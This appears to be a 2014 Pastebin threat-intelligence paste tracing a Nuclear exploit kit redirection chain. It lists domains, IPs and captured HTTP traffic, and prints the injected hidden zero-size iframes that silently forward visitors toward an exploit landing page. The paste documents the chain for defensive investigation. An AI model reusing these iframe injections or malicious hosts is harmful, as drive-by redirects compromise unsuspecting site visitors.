Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie | Nuclear Exploit infection domain chains..(in investigation)
- # *.hak.su / wen.ru (178.218.210.188)
- # vubetw.com/* (95.211.52.50)
- # sk6ev8d.fielderpercussionist.pw/* (192.95.10.211)
- # pic: http://box.jisko.net/i/965eec32.png
- # Thursday January 16 2014 -- 19:13:36 +02:00
- # credit: mak`
- Lead:
- h00p://jp.hak.su
- // forwarded to...
- GET / HTTP/1.1
- Accept: text/html, application/xhtml+xml, */*
- Referer: h00p://www.google.com
- Accept-Language: en-US
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
- Accept-Encoding: gzip, deflate
- Host: jp.hak.su
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Server: WEN.RU httpD 3.7
- Content-Type: text/html; charset=utf-8
- Date: Thu, 16 Jan 2014 16:06:48 GMT
- Last-Modified: Thu, 16 Jan 2014 12:36:22 GMT
- Accept-Ranges: bytes
- Connection: close
- Cache-Control: no-cache, max-age=0
- Pragma: no-cache
- Expires: Wed, 15 Jan 2014 16:06:48 GMT
- Content-Length: 291
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>jp.hak.su</title></head><body>
- <p align="center">
- </p></body></html> <iframe src="h00p://vubetw.com/jp.php" width="0" height="0"></iframe>
- // forwarded to:
- less jp.php
- <iframe width=10 height=10 src="h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html"></iframe>
- //Fetch
- --2014-01-17 01:30:40-- h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html
- Resolving sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)... 192.95.10.211
- Caching sk6ev8d.fielderpercussionist.pw => 192.95.10.211
- Connecting to sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)|192.95.10.211|:80... connected.
- GET /69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html h00p/1.1
- Referer: h00p://vubetw.com/jp.php
- Host: sk6ev8d.fielderpercussionist.pw
- HTTP request sent, awaiting response...
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 16 Jan 2014 16:30:45 GMT
- Content-Type: text/html
- Connection: keep-alive
- X-Powered-By: PHP/5.3.27
- Vary: Accept-Encoding,User-Agent
- Content-Length: 3
- 200 OK
- Length: 3 [text/html]
- Saving to: '38201690f2b69d4483bd4893d72c0ee8.html'
- 2014-01-17 01:30:41 (56.4 KB/s) - '38201690f2b69d4483bd4893d72c0ee8.html' saved
- ---
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement